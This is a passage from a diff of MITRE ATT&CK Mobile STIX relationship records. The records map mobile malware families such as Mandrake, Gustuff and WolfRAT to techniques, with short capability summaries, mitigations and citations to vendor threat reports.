"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-05-07T15:33:32.778Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) exploits known OS vulnerabilities, including Janus, to replace legitimate applications with malicious versions.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a3a8b2f2-f1aa-49ba-be55-a674f371f209", + "type": "relationship", + "created": "2020-04-24T15:06:33.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect device network configuration information, such as Wi-Fi SSID and IMSI.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--74eb8469-1cce-40f8-8b6b-486338e8cfbe", + "type": "relationship", + "created": "2020-07-15T20:20:59.282Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.282Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can record the screen.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6bb6c55-3b33-4cd4-981b-055551edc4c2", + "created": "2023-01-18T21:24:28.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:55:39.648Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use a Domain Generation Algorithm to decode the C2 server location.(Citation: nccgroup_sharkbot_0322) ", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd6829ee-dc51-477b-9739-1cd1cd304b6c", + "created": "2020-09-11T14:54:16.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:14.199Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can hide its icon.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5d0fdc8a-af17-4334-88e6-111aa290b22f", + "created": "2023-03-20T18:43:14.051Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:14.051Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6faacfdd-d17d-4c6e-a33e-5fdea2cc3998", + "created": "2020-04-08T15:41:19.385Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) can create overlays to capture user credentials for targeted applications.(Citation: Cofense Anubis)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd7a2294-1e14-42e8-b870-d99d73443b88", + "created": "2022-04-01T12:37:42.068Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught the danger behind granting unnecessary permissions to an application and should be advised to use extra scrutiny when an application requests them. ", + "modified": "2022-04-01T12:37:42.068Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa1deed1-800c-470b-ac88-eb8013c11ec0", + "created": "2019-09-03T20:08:00.711Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) uses WebView overlays to prompt the user for their device unlock code, as well as banking and cryptocurrency application credentials. [Gustuff](https://attack.mitre.org/software/S0406) can also send push notifications pretending to be from a bank, triggering a phishing overlay.(Citation: Talos Gustuff Apr 2019)(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-19T19:42:17.904Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1", + "created": "2020-07-15T20:20:59.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:57.748Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access SMS messages.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50bab448-fee6-49e9-a296-498fe06eacc7", + "type": "relationship", + "created": "2019-11-21T16:42:48.490Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." + } + ], + "modified": "2019-11-21T16:42:48.490Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can obtain a list of installed applications.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c874ffa-63c3-491f-8d8c-623b19a7fdad", + "created": "2020-04-24T15:06:33.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:37:37.674Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect the device’s call log.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b2c2716-a62b-4c3a-a211-d72bb5ed29b9", + "created": "2020-09-11T14:54:16.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:05.260Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect the device’s contact list.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc79d59b-1828-4133-9f8f-df8cad9543a8", + "created": "2019-11-21T16:42:48.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:37:19.124Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can delete arbitrary files from the device.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4819f391-01de-4525-992b-7e4a4f6667de", + "type": "relationship", + "created": "2020-11-20T15:46:51.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T15:46:51.603Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can take pictures with the camera.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--749dcdbd-9be9-403b-850f-8ee5452b7aed", + "created": "2023-03-20T18:58:56.347Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:56.347Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0c3afc8-4b23-45fc-89cf-2cafbb51291e", + "created": "2023-03-03T16:25:52.931Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:25:52.931Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected information about installed applications.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3acbaa64-fb6e-4c26-ada4-1aab88798265", + "created": "2021-04-19T14:29:46.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:42.930Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has used HTTPS for C2 communication.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.112Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads information about installed packages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--268c12df-d3bc-46fa-99e9-32caab50b175", + "created": "2022-03-30T15:52:09.759Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T15:52:09.759Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5dac41f-4a16-44ea-b279-b84c927ce62d", + "created": "2019-09-03T20:08:00.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:36.853Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) communicates with the command and control server using HTTP requests.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6ba09d73-4ed5-4a37-8191-fc54a8f01696", + "created": "2022-03-28T19:38:23.189Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:38:23.190Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--127e6672-d16a-4370-b277-4d04874a4cfe", + "created": "2023-02-06T19:37:24.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:29:31.138Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use overlays capture banking credentials and credit card information, and can open arbitrary WebViews from the C2.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--289f5e23-088a-4840-a2a6-bab30da2a64b", + "created": "2022-04-01T16:51:04.584Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "GoogleIO2016", + "url": "https://www.youtube.com/watch?v=XZzLjllizYs", + "description": "Adrian Ludwig. (2016, May 19). What's new in Android security (M and N Version). Retrieved December 9, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Changes were introduced in Android 7 to make abuse of device administrator permissions more difficult.(Citation: GoogleIO2016)", + "modified": "2022-04-01T16:51:04.584Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1db350b2-1e8b-4d58-9086-eac41de1b110", + "created": "2022-04-05T17:13:56.584Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:13:56.584Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2c5b36b4-5381-4d9e-9ce5-cd7cd19041b1", + "created": "2020-07-20T13:27:33.514Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:47.258Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can delete files from the device.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--21e179f2-49c9-4ec9-ac7a-b8eae8e15bd9", + "created": "2020-07-20T13:27:33.509Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:36:07.297Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect the device’s call log.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + 